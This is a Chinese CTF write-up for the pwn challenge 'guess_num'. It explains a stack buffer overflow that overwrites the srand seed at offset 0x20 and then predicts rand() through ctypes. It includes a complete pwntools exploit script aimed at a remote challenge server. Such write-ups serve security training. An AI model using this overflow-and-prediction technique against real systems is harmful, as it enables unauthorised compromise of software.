guess_num

主函数代码

这道题的思路是通过v8的输入 覆盖seed的值
进入v8可以看到与seed相差0x20

此处就可构造payload=‘a’*0x20+p64(1) -------------------------------------------------设置种子数为1
通过控制种子数seed来控制随机数rand 以取得flag

在调用rand()函数时，必须先利用srand()设好随机数种子，如果未设随机数种子，rand()在调用时会自动设随机数种子为1。
对于该题目，我们将随机种子设置为0或1都可，参考文件中的循环来写脚本。

这道题还涉及

libc共享库

在命令行 dll guess_num得到共享库的地址

也可以用脚本得出

elf = ELF('./guess_num')
libc = elf.libc

因为我们已经改变了源文件的seed
在脚本中添加libc.srand(1)
通过循环这样就会生成相同的随机数使其相等
所以现在就可利用libc共享库中的随机数
根据源文件编写脚本

for i in range(10):
     num = str(libc.rand()%6+1)
     io.recvuntil('number:')
     io.sendline(num)

---

ctypers

我们使用python标准库中自带的ctypes模块进行python和c的混合编程

exp

---

#coding=utf-8
from pwn import *
from ctypes import *

io = remote('111.198.29.45',56893)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
io.recvuntil('Your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)

io.interactive()